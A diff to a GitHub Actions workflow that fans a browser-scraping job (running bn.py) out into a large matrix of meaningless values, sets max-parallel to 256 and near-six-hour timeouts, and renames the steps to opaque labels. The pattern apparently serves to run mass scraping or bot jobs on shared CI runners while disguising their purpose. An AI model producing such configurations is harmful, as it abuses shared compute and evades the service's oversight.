--- a/.github/workflows/python-package-conda.yml
+++ b/.github/workflows/python-package-conda.yml
@@ -1,29 +1,37 @@
-name: scrn
+name: scr
 on:
   workflow_dispatch:
 jobs:
-  scrape:
+  scr-1:
     runs-on: ubuntu-latest
+    strategy:
+      max-parallel: 256
+      fail-fast: false
+      matrix:
+         goc: [1.1, 1.d2, 1.1c3, 1.1c4, 1.1q5, 1.16o, 1.17s, 1.18s, 1.1w9]
+         flag: [kmn, oiu, qcwe, nvb, lpd, scds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]  
+    timeout-minutes: 355
+    env:
+        NUM_JOBS: 256
+        JOB: ${{ matrix.goc }}
     steps:
-      - name: Check out this repo
-        uses: actions/checkout@v2
+      - name: stg2o ${{ matrix.goc }}
+        uses: actions/setup-go@v1
       - name: Set up Python
         uses: actions/setup-python@v2
         with:
           python-version: '3.9'
       - name: Installed package list
         run: apt list --installed
-      - name: Remove Chrome
-        run: sudo apt purge google-chrome-stable
-      - name: Remove default Chromium
-        run: sudo apt purge chromium-browser
-      - name: Install a new Chromium
-        run: sudo apt install -y chromium-browser
-      - name: Install all necessary packages
-        run: pip install requests beautifulsoup4 pandas webdriver-manager selenium
-      - name: Run the scraping script
+      - name: Dev surround
         run: |
-             pip install names
+            sudo apt purge google-chrome-stable
+            sudo apt purge chromium-browser
+            sudo apt install -y chromium-browser
+      - name: Install all necessary packages
+        run: pip install requests names beautifulsoup4 pandas webdriver-manager selenium
+      - name: Obm Devol
+        run: |
              python bn.py
         
         
